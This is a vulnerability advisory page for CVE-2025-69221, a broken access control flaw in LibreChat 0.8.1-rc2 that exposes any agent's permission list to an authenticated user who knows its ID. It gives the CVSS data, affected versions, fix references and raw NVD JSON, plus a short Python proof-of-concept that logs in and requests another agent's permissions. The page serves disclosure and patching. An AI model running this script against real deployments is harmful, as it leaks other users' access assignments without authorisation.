CVE-2025-69221

Description

LibreChat is a ChatGPT clone with additional features. Version 0.8.1-rc2 does not enforce proper access control when querying agent permissions. An authenticated attacker can read the permissions of arbitrary agents, even if they have no permissions for this agent. LibreChat allows the configuration of agents that have a predefined set of instructions and context. Private agents are not visible to other users. However, if an attacker knows the agent ID, they can read the permissions of the agent including the permissions individually assigned to other users. This issue is fixed in version 0.8.2-rc2.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:librechat:librechat:0.8.1:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:librechat:librechat:0.8.1:rc1:*:*:*:*:*:* - VULNERABLE

LibreChat 0.8.1-rc2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import json # CVE-2025-69221 PoC - LibreChat Agent Permission Bypass # Target: LibreChat <= 0.8.1-rc2 TARGET_URL = "http://target-host.com" LOGIN_ENDPOINT = f"{TARGET_URL}/api/auth/signin" AGENT_PERMISSIONS_ENDPOINT = f"{TARGET_URL}/api/agents/{{agent_id}}/permissions" def exploit_cve_2025_69221(): """ This PoC demonstrates the broken access control in LibreChat agent permission queries. An authenticated attacker can read permissions of arbitrary agents by knowing the agent ID. """ # Step 1: Authenticate with valid credentials credentials = { "email": "[email protected]", "password": "password123" } session = requests.Session() login_response = session.post(LOGIN_ENDPOINT, json=credentials) if login_response.status_code != 200: print("[-] Authentication failed") return False print("[+] Authentication successful") # Step 2: Query arbitrary agent permissions using known agent ID # The vulnerability allows bypassing access control by directly specifying agent ID target_agent_id = "TARGET_AGENT_UUID_HERE" # Replace with target agent UUID headers = { "Content-Type": "application/json" } # This request bypasses access control - no ownership verification permissions_response = session.get( AGENT_PERMISSIONS_ENDPOINT.format(agent_id=target_agent_id), headers=headers ) if permissions_response.status_code == 200: permissions_data = permissions_response.json() print("[+] Permission bypass successful!") print(f"[+] Leaked permissions: {json.dumps(permissions_data, indent=2)}") return True else: print(f"[-] Request failed with status code: {permissions_response.status_code}") return False if __name__ == "__main__": exploit_cve_2025_69221()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-69221
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-69221
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-69221/
[4] VulDB https://vuldb.com/cve/CVE-2025-69221
[5] https://github.com/danny-avila/LibreChat/commit/06ba025bd95574c815ac6968454be7d3b024391c
[6] https://github.com/danny-avila/LibreChat/releases/tag/v0.8.2-rc2
[7] https://github.com/danny-avila/LibreChat/security/advisories/GHSA-5ccx-4r3h-9qc7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-69221", "sourceIdentifier": "[email protected]", "published": "2026-01-07T21:15:59.760", "lastModified": "2026-01-15T21:45:38.540", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LibreChat is a ChatGPT clone with additional features. Version 0.8.1-rc2 does not enforce proper access control when\nquerying agent permissions. An authenticated attacker can read the permissions of arbitrary agents, even if they have no permissions for this agent. LibreChat allows the configuration of agents that have a predefined set of instructions and context. Private agents are not visible to other users. However, if an attacker knows the agent ID, they can read the permissions of the agent including the permissions individually assigned to other users. This issue is fixed in version 0.8.2-rc2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-862"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:librechat:librechat:0.8.1:-:*:*:*:*:*:*", "matchCriteriaId": "98BB9E92-2D0E-4975-A966-734F3858551B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:librechat:librechat:0.8.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "8DAB7F45-699A-4383-ABEA-D4374E58EE95"}]}]}], "references": [{"url": "https://github.com/danny-avila/LibreChat/commit/06ba025bd95574c815ac6968454be7d3b024391c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/danny-avila/LibreChat/releases/tag/v0.8.2-rc2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/danny-avila/LibreChat/security/advisories/GHSA-5ccx-4r3h-9qc7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}